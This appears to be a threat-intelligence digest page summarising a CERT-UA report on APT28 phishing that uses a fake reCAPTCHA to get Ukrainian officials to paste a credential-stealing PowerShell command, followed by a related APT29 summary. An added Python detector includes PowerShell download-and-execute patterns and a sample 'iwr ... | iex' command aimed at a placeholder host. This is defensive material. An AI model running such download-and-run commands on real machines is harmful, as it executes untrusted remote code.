One Article Review

Source: RiskIQ
Identifier: 8602832
Publication date: 2024-10-28 12:22:25 (viewed: 2024-10-28 13:07:20)
Title: Cyberattack UAC-0001 (APT28): PowerShell command in the clipboard as an "entry point"
Text:

#### Targeted geolocations
- Ukraine

#### Targeted industries
- Government agencies and services

## Snapshot
The Computer Emergency Response Team of Ukraine (CERT-UA) is investigating phishing emails targeting Ukrainian local governments, disguised with the subject "Table replacement" and containing a malicious link mimicking Google Sheets. This activity, which leverages social engineering and PowerShell to steal credentials and deploy Metasploit, is likely linked to the Russian threat actor APT28, tracked by Microsoft as [Forest Blizzard](https://sip.security.microsoft.com/intel-profiles/DD75F93B2A771C9510DCEEC817B9D34D868C2D1353D08C8C1647DE067270FDF8).

## Description
When clicking the link in the email, users are presented with a fake reCAPTCHA prompt. Following the prompt's instructions launches a PowerShell command that downloads and executes files enabling SSH tunneling, browser credential theft (from Chrome, Edge, Opera, Firefox) and Metasploit deployment on the compromised machine.

CERT-UA notes a related incident in September 2024, where [attackers exploited a Roundcube vulnerability](https://sip.security.microsoft.com/intel-explorer/articles/7c0b1160) ([CVE-2023-43770](https://sip.security.microsoft.com/intel-explorer/cves/cve-2023-43770/)) to intercept email data and redirect mailboxes to the attacker's address. Both attacks used a compromised server, "mail.zhblz[.]com", and more than 10 government email accounts were compromised and monitored by the attackers to spread the exploits, even reaching defense departments abroad.
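Added example, not code from the CERT-UA or Microsoft report: a small detector, run over constructed Sysmon-style process-creation events, that flags PowerShell started from the Windows shell (the parent a pasted Run-dialog command produces) when its command line carries download-and-execute, encoded-command or hidden-window indicators. The field names, sample events and indicator patterns are assumptions for illustration, not values taken from the report.

```python
import re
from typing import Dict, List

# A launch typed by the user (Win+R / Run dialog) is spawned by explorer.exe.
SHELL_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Assumed generic patterns for the "download, then run" shape the report describes;
# they are not indicators taken from the report.
INDICATORS: Dict[str, re.Pattern] = {
    "download": re.compile(
        r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|net\.webclient", re.I),
    "in_memory_exec": re.compile(r"invoke-expression|\biex\b", re.I),
    "encoded": re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\b|frombase64string", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}
ALERTING = {"download", "in_memory_exec", "encoded"}

def basename(path: str) -> str:
    """Last path component, lower-cased, accepting either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event: dict) -> List[str]:
    """Return the matched indicator names; an empty list means no alert."""
    if basename(event["parent"]) not in SHELL_PARENTS:
        return []
    if basename(event["image"]) not in POWERSHELL_IMAGES:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmd"])]
    # A hidden window alone is not enough; require a download, exec or encoding indicator.
    return hits if ALERTING & set(hits) else []

def scan(events) -> List[tuple]:
    """(index, hits) for every event that alerts."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events) if evaluate(ev)]

# Constructed sample events (Sysmon-style fields); not taken from the report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    {"parent": EXPLORER, "image": PS, "cmd": 'powershell -w hidden -c "iwr http://example.invalid/a | iex"'},
    {"parent": EXPLORER, "image": PS, "cmd": "powershell -NoProfile -Command Get-Date"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS, "cmd": 'powershell -c "iwr http://example.invalid/a | iex"'},
    {"parent": EXPLORER, "image": PS, "cmd": "powershell -NoP -Enc SQBFAFgA"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"ALERT event {idx}: {', '.join(hits)}")
```

The third sample has the same command line as the first but a cmd.exe parent, so it is left for a separate rule: this one is scoped to the shell-launched case the report describes.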
## Microsoft Analysis and Additional OSINT Context
The group Microsoft tracks as Forest Blizzard (Strontium) is a Russian state-sponsored threat actor that primarily targets government, energy, transportation and non-governmental organizations in the United States, Europe and the Middle East. Microsoft has also observed Forest Blizzard (Strontium) targeting media, information technology, sports organizations and educational institutions worldwide. The [United States and United Kingdom governments](https://media.defense.gov/2021/jul/01/2002753896/-1/-1/1/csa_gru_global_brute_force_campaign_uoo158036-21.pdf) have linked Forest Blizzard (Strontium) to Unit 26165 of the Russian Federation's military intelligence agency: the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).

Other security researchers have also reported on attackers exploiting a Roundcube vulnerability to target Central European governments. In October, [Positive Technologies researchers identified](https://sip.security.microsoft.com/intel-explorer/articles/7c0b1160) a campaign exploiting a stored cross-site scripting (XSS) vulnerability in the Roundcube webmail client, targeting government organizations in the CIS region. The vulnerability, [CVE-2024-37383](https://sip.security.microsoft.com/intel-explorer/cves/cve-2024-37383/?tid=72F988BF-86F1-41AF-91AB-2D7CD011DB47), allows execution of malicious JavaScript code on the Roundcube page when a specially crafted email is opened. Positive Technologies has not publicly attributed the attack.

## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques.
Rating: ★★★★
Sent: Yes
Tags: Ransomware Tool Vulnerability Threat
Stories: APT 28


The article does not appear to have been picked up again after its publication.


The article resembles 1 other article(s):
Src | Date (GMT) | Title | Description | Tags | Stories | Rating
RiskIQ 2024-10-28 22:05:17 (Déjà vu) Amazon identified internet domains abused by APT29
## Snapshot
Amazon, building on reporting by the Computer Emergency Response Team of Ukraine (CERT-UA), identified and disrupted a phishing campaign attributed to [Midnight Blizzard](https://security.microsoft.com/intel-explorer/articles/2c8cb717).

## Description
The campaign, active since at least August 2024, has a broad target set and includes entities related to government, enterprise, and military in countries of interest to Russia. The group leveraged Ukrainian language phishing emails to collect its targets' Windows credentials through Microsoft Remote Desktop. Many of the domains used by Midnight Blizzard spoofed Amazon Web Services (AWS), among other organizations. Amazon has seized many of the domains to disrupt the campaign.

## Microsoft Analysis and Additional OSINT Context
Microsoft attributes this malicious activity to [Midnight Blizzard](https://security.microsoft.com/intel-explorer/articles/2c8cb717) based on the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) reported by Amazon and CERT-UA. The actor Microsoft tracks as Midnight Blizzard is known to primarily target governments, diplomatic entities, NGOs, and IT service providers, mainly in the United States and Europe. Their focus is to collect intelligence through longstanding and dedicated espionage of foreign interests that can be traced to early 2018 by leveraging the use of identity. Midnight Blizzard is consistent and persistent in their operational targeting and their objectives rarely change. They utilize diverse initial access methods ranging from stolen credentials to supply chain attacks, exploitation of on-premises environments to laterally move to the cloud, exploitation of service providers' trust chain to gain access to downstream customers, and the Active Directory Federation Services (ADFS) malware known as FOGGYWEB and MAGICWEB. Midnight Blizzard is tracked by partner security companies as APT29, UNC2452, and Cozy Bear.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.

- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint.
- Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access.
- [Enable](https://learn.microsoft.com/en-u

Tags: Ransomware Malware Tool Threat Cloud
Stories: APT 29
Rating: ★★★